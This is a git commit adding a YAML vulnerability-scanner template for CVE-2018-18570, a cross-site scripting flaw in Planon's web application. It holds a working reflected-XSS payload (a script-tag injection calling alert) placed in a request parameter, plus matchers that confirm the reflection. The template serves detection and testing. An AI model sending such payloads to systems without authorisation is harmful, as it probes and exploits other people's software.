Create CVE-2018-18570.yaml

patch-1
Prince Chaddha 2021-11-03 11:36:30 +05:30 committed by GitHub
parent e2b4d2b29c
commit fd9e89e0db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2018-18570
info:
name: Cross-Site Scripting on Planon web application
author: emadshanab
severity: medium
description: Planon before Live Build 41 has XSS
reference:
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
tags: xss,cve,cve2018,planon
requests:
- method: GET
path:
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header